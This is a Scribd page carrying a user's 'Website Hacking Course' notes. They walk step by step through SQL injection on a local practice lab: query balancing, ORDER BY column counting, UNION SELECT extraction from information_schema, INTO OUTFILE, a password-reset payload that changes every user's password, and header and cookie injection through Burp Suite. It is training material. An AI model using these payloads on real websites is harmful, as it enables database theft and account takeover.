Scribd Logo
Carica

Benvenuto in Scribd!

  • Website Hacking New

    Caricato da

    Raj Malhotra
    15 visualizzazioni24 pagine
    Web Hacking Notes

    Copyright

    © © All Rights Reserved

    Formati disponibili

    DOCX, PDF, TXT o leggi online da Scribd

    Hai trovato utile questo documento?

    Questo contenuto è inappropriato?

    Segnala questo documento
    Web Hacking Notes

    Copyright:

    © All Rights Reserved
    Scarica in formato DOCX, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    15 visualizzazioni24 pagine

    Website Hacking New

    Caricato da

    Raj Malhotra
    Web Hacking Notes

    Copyright:

    © All Rights Reserved
    Scarica in formato DOCX, PDF, TXT o leggi online su Scribd
    Segnala contenuti inappropriati
    di 24

    Website Hacking Course

    1. Different Type of Website Attacks

    2. Different Type of Websites :-

    A. Static Websites = Websites which remain same in every manner


    B. Dynamic Websites = Websites Which change according to user or user login

    3. Different Website Languages :-

    4. Different Web Protocols

    A. HTTP = Hyper Text Transfer Protocol


    B. HTTPS = Hyper Text Transfer Protocol Secure
    5. Website Response in Static Website

    6. Website response in Dynamic Website

    7. SQL Queries which PHP use to Interact with Database, Example;


    8. Structure of Database

    9. Install XAMPP Server For Creating a Demo Server in Vmware


    10. PHPMyadmin is used to Manage DB Graphically

    11. GET Vs POST

    A. Get = Input Given Via URL


    B. POST = Input given by FORM on a Website
    (Post)

    (GET)

    12. Cookies Vs Sessions

    A. Cookies = Permanent Method to maintain Login Sessions & Useful for Advertisements, It’s
    a small text file save in our computer
    B. PHP Sessions = Temporary way to maintain Login Sessions, when you close browser,
    Sessions is closed
    13. Install HT Web Application in XAMPP

    14. Let’s Start With Lesson Number 1 in HT Web Application


    15. Let’s Start giving input Via GET Input Parameter as ID

    It Returns a Username & Password as Designed by the Website Owner, He can return anything back

    16. First step is Fuzzing the Application by giving some extra characters in Input Parameter in URL

    17. Now We have to Copy the error & Guess the Query

    Select username, password from Table_name Where id = 1


    18. Lets Copy the error & Delete a pair of quotes, one from Last & one from beginning

    Select username, password from Table_name Where id = ‘1’

    We can See its Using Single Quotes from The Error

    19. Next Step is Balance the Query because we have to get out from ID Area,

    Select username, password from Table_name Where id = ‘ 1’ --+ ’

    That’s What we will type more to balance the query 1’ --+

    20. Let’s Check in Web Application

    And it works Well, Now Perform Same Steps on lesson 3,4,2.


    21. Now we have to start fetching the data , but before that we need to find number of columns
    left side

    No Error on Order by 1. Try Order by 2, Order by 3, Order by 4. Till the point we don’t get error

    22. On Order By 4, We get error, means 3 columns are used in this Website Query

    23. Now we have to start using Union Select 1,2,3 (because there are three columns in Statement),
    And we have to give a big number to make first statement wrong, so second our own will work

    ?id=1000’ union select 1,2,3 --+


    2,3 are printing on the screen. We can use any numbers. We have to use 3 columns in any how

    24. Now 2,3 are printing on the screen so we will change that 2 only to find the things on screen

    25. So Database name is found which is “Security” , Now we need to find :-

    A. Database Name
    B. Table Names
    C. Column Names
    D. Data
    26. To Find Table Names we need to take help of a database name “Information_schema”

    union select 1,2,group_concat(table_name) from information_schema.tables where


    table_schema='security' --+

    27. Now We need to find all the column names from all the tables

    union select 1,2,group_concat(column_name) from information_schema.columns where


    table_name='users' --+
    28. Find all the Column Names

    29. Now find all the Data From Users, Same how we need to find from Emails

    Same Thing We need to Perform on Emails Table & Chapter 3,4,2.


    30. Lesson Number 7, No Output – No Error

    31. Guess The Query With Order by, Not work till Balance Right
    32. Works Fine Now, once we balance properly

    Use Outfile Function


    33. Now we can see results coming in newly created files. Change commands for new data

    34. Now we have to perform same steps in POST – Lesson 12

    Use Backslash to generate the error, Use Order by to get column numbers
    35. Now use Union Select

    Same way we have to Dig out data from other commands

    36. Lesson 13, Is POST with Outfile, Generate Error then forward output in outfile.

    37. Password Reset Page SQL Injection


    38. Break the Query

    39. We can see its using Single Quotes, now we will make a injection

    Update users set password = ‘INPUT’ where password= ‘Input’

    Update users set password = ‘ ‘ or 1=1 # ’ where password= ‘Input’

    It will reset password 1 on every user, because 1=1 is always one, and username section is
    commented with #, so it will affect all
    40. Next Chapter 18 we cannot use directly to break query. So we have to use burp suite to create
    error

    Configure burp first in firefox network settings.


    41. Now open Burp suite, And open website with IP Address too not local host.

    We can stop inside Burp Suite and change User – Agent to = \

    Which will generate error which we were not able to generate directly because of restrictions
    This is How we can proceed every lesson in Burp suite, by injection in different fields via burp suite

    42. Next Chapter is cookie Injection, if cannot inject anywhere then next thing to try is cookie,
    Install a addon Cookie-Editor in Firefox

    Username is cookie, which we can change to shit users, or we can also use union select
    statements
    Same way we can dig out all data with other commands

    43. On Chapter 21, Cookie is Encrypted it’s still username but in Encrypted Form, So we have to
    use encrypted ejections in Cookie
    We can see Error Is Generated, We can same way give other commands in Encrypted Value to Perform
    Other Injections.

    Potrebbero piacerti anche